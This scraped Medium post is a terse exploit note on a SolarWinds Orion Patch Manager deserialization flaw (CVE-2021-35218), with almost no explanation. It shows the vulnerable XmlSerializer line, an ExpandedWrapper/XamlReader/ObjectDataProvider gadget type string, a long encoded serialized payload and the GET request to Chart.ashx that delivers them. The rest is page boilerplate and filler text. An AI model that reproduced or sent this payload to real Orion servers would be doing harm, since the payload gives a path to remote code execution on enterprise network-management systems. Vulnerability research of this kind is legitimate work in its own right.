50 Shades of SolarWinds Orion (Patch Manager) Deserialization (Final Part: CVE-2021–35218)

XmlSerializer xmlSerializer = new XmlSerializer(Type.GetType(context.Request.QueryString["tp"]));
tp=System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
dlZSTmI5UXdFTDN6SzRMdmpiY2djVEJKcW9ydEFVR2g2cTVFcGFvSHg1N2ROWXJ0eUdPYVJJai96bXoySXlrYlBub2hKMmZldlBIenpMT3ppOVpXeVNNRU5ON2w3RHlkc1l2aVJVSmZkdFhXMG1uUVg0S3Nhd2lmVjNmU1ZyY2dOYTNMcjZEaVhFWjVFL3lqb1VoQ1pSeUtGazNPTmpIV2d2T21hZExtZGVyRG1yK2F6Yzc1M2ZYSGhkcUFsV2ZHWVpST0FUdXk5TjlaTE5ucGVxTHRxZ0lMTHZJUlJJcTI0a0RUZ21USGJqYUFmY0kxeEkzWG42U0Y0a1lHaEl5UElsT3BsRVZRcEI0OWhmc1U2YnBsVjhQL09EOFZGNUgyeWhrUkJNWmczSnFkU3VwbHZieC9ONzljWHQ1bnQ0RCtXMUF3TnlyU2lHWG9kcHNlTjhTK09xYldxT0RScjJLcXZPV05jYXQycStBTmIybnN2QTZBMUdpNXJYR1FyWjlYNDBBcmM2YXFjT2FvcDFoTEJXTFJZUVQ3VmlLQ0xhc3V0Nmg4cUV4NUlLaHBRam8zY3UwOFJxTndJR09Qc1NLYjhLZ1dINkRMR1V0MjJMTHY1WGN0K2dFcVFYa0tFSCt3WkRCRXpoWlJoamhaTHoyeFIxYUtSVCtXUWxtZDhlUGZFT2NxVWJKU0tiUXd4dmsvVlovSW91RHBoSXVIaHdtbjhyMVZmL0U0LzdQSjkrZCt2N2ZzeUlURGM4Q08wZzVwby92SWYzY2hNLzZzRjZiNENRPT01
GET /orion/PM/Chart.ashx/Skipi18n?tp=<type>&chart=<serialized data> HTTP/1.1

--

--

--

asdasd asdasdasd asdasdasd

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jang

Jang

asdasd asdasdasd asdasdasd

More from Medium

IndexedDB Storage

World of Warcraft — Eternities End Preparation

BUG BOUNTY SEASON 2 — BUG HUNTING IN CLOSE BETA

Cisco IOS Upgrade -Image Failed Digital Signature Verification — ICT Fella